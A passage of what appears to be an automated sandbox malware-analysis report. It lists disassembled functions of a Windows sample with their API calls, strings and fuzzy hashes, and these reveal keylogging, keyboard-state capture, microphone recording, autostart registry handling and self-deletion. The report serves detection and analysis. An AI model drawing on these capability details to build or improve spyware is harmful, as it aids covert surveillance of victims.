                                                  • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 88f98e07624f0cdc5f5406798babcb05efc51bc28ea43e2309e29ec04d21d8db
                                                  • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                  • Opcode Fuzzy Hash: 88f98e07624f0cdc5f5406798babcb05efc51bc28ea43e2309e29ec04d21d8db
                                                  • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00448943
                                                  • GetFileType.KERNEL32(00000000), ref: 00448955
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID: Hy[
                                                  • API String ID: 3000768030-2207010729
                                                  • Opcode ID: ccc95ea5b6d1fe52f093f2cf044264499b4e41becef1697495b2cca3fae492d0
                                                  • Instruction ID: e72e3a163d38be5f7a7623f46eac45f8fe04114c14e2a7ad6025d4c7bfa50cde
                                                  • Opcode Fuzzy Hash: ccc95ea5b6d1fe52f093f2cf044264499b4e41becef1697495b2cca3fae492d0
                                                  • Instruction Fuzzy Hash: D41145B1508F524AE7304E3D8C8863BBA959756330B380B2FD5B6867F1CF28D886954B
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: Hy[
                                                  • API String ID: 269201875-2207010729
                                                  • Opcode ID: ca01ae77a811ea6e1882d950de224612bd516a70c3fdde4a712b874a0400f1fb
                                                  • Instruction ID: 8090df87744a04f370904591f18fafe20db4d8262e12f9b5c6200b5f8240d2d1
                                                  • Opcode Fuzzy Hash: ca01ae77a811ea6e1882d950de224612bd516a70c3fdde4a712b874a0400f1fb
                                                  • Instruction Fuzzy Hash: C111E671A4030147F7249F2DAC42F563298E755734F25222BF979EB6E0D778C892428E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LG$XG
                                                  • API String ID: 0-1482930923
                                                  • Opcode ID: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                                                  • Instruction ID: b803d8f2fb0d60b71c32d24796bf113498d2ea24005d64aa96dbf80bf0db992b
                                                  • Opcode Fuzzy Hash: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                                                  • Instruction Fuzzy Hash: CE11A3B1D01654AACB20EFA998017CFB7A55F09725F14D06BED18EF281D3B9DB408B98
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 9b95a0a033af4e6b3b54331b4a103e7e6270c3a9d1cca9dd8a72674f32e816fd
                                                  • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                  • Opcode Fuzzy Hash: 9b95a0a033af4e6b3b54331b4a103e7e6270c3a9d1cca9dd8a72674f32e816fd
                                                  • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412612
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412648
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID: TUF
                                                  • API String ID: 3660427363-3431404234
                                                  • Opcode ID: c4e216894b58aee55caec26845d8524ac01ef4dd0a633f9c8df4f60fb7a150f6
                                                  • Instruction ID: 62a4949b47554db758ef5e9b715c6ec4cc130d120bf99ac1ec1555789b8052d8
                                                  • Opcode Fuzzy Hash: c4e216894b58aee55caec26845d8524ac01ef4dd0a633f9c8df4f60fb7a150f6
                                                  • Instruction Fuzzy Hash: BC01A7B6A00108BFDB049B95DD46EFF7ABDDF44240F10007AF901E2251E6749F009664
                                                  APIs
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                  • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: fe6e18c6252a0bee342ef941cd7d9d06612fb05f1df7cb5e72a2689b447559bc
                                                  • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                  • Opcode Fuzzy Hash: fe6e18c6252a0bee342ef941cd7d9d06612fb05f1df7cb5e72a2689b447559bc
                                                  • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                  APIs
                                                    • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046DCA8,00000010,0043AD15), ref: 004487C5
                                                  • _free.LIBCMT ref: 004487D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$DeleteEnter_free
                                                  • String ID: Hy[
                                                  • API String ID: 1836352639-2207010729
                                                  • Opcode ID: 70fd0d90dafa84e5954845fa7c0139c51f18b2004160b2b9a8cec1cc6ebfe676
                                                  • Instruction ID: 80ff6b1ebb5c52940da2afcd5602a1ef1f033d169bf7bf1965dfa6e3099da3c5
                                                  • Opcode Fuzzy Hash: 70fd0d90dafa84e5954845fa7c0139c51f18b2004160b2b9a8cec1cc6ebfe676
                                                  • Instruction Fuzzy Hash: 6E1179359002059FE724DF99D842B5C73B0EB08729F25415AE865AB2B2CB38E8828B0D
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(005AE9A0,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                  • waveInAddBuffer.WINMM(005AE9A0,00000020,?,00000000,00401913), ref: 0040175D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: T=G
                                                  • API String ID: 2315374483-379896819
                                                  • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                  • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$j=D
                                                  • API String ID: 1901932003-3128777819
                                                  • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                  • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                  • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                  • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID: T=G$T=G
                                                  • API String ID: 3519838083-3732185208
                                                  • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                  • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                    • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                    • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                    • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                    • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                    • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: 0fd097a0a4b99d70b02a08e9004214b89ee8ccd3163f9cf7526c1a47b2b50f16
                                                  • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                  • Opcode Fuzzy Hash: 0fd097a0a4b99d70b02a08e9004214b89ee8ccd3163f9cf7526c1a47b2b50f16
                                                  • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                  APIs
                                                  • _free.LIBCMT ref: 00448825
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID: `@$`@
                                                  • API String ID: 1353095263-20545824
                                                  • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                  • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                  • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                  • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 8f256fbae12a6d1972e20e0d193ff0540306bf2bf736503aba8af0ee0077a29a
                                                  • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                  • Opcode Fuzzy Hash: 8f256fbae12a6d1972e20e0d193ff0540306bf2bf736503aba8af0ee0077a29a
                                                  • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                  APIs
                                                    • Part of subcall function 00448763: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046DCA8,00000010,0043AD15), ref: 004487C5
                                                    • Part of subcall function 00448763: _free.LIBCMT ref: 004487D3
                                                    • Part of subcall function 00448803: _free.LIBCMT ref: 00448825
                                                  • DeleteCriticalSection.KERNEL32(005B7928), ref: 0043AD31
                                                  • _free.LIBCMT ref: 0043AD45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$CriticalDeleteSection
                                                  • String ID: Hy[
                                                  • API String ID: 1906768660-2207010729
                                                  • Opcode ID: 105ba6d038f868bf5ead38a2174c8304849bb37afa14ec3855613d5ccb5e7185
                                                  • Instruction ID: c0f14a4ae43bd4c9a132c894413e2ce2621f066976e8a01f329b24b3578183a2
                                                  • Opcode Fuzzy Hash: 105ba6d038f868bf5ead38a2174c8304849bb37afa14ec3855613d5ccb5e7185
                                                  • Instruction Fuzzy Hash: 3EE0D832C042108BF7247B5DFC469493398DB49725B13006EF81873171CA246CD1864D
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: pth_unenc
                                                  • API String ID: 3325800564-4028850238
                                                  • Opcode ID: 2e8d6704218f96b318e7a73bad0b28a6b8edcd2455483e95ffe0dafda84626ef
                                                  • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                  • Opcode Fuzzy Hash: 2e8d6704218f96b318e7a73bad0b28a6b8edcd2455483e95ffe0dafda84626ef
                                                  • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                  APIs
                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
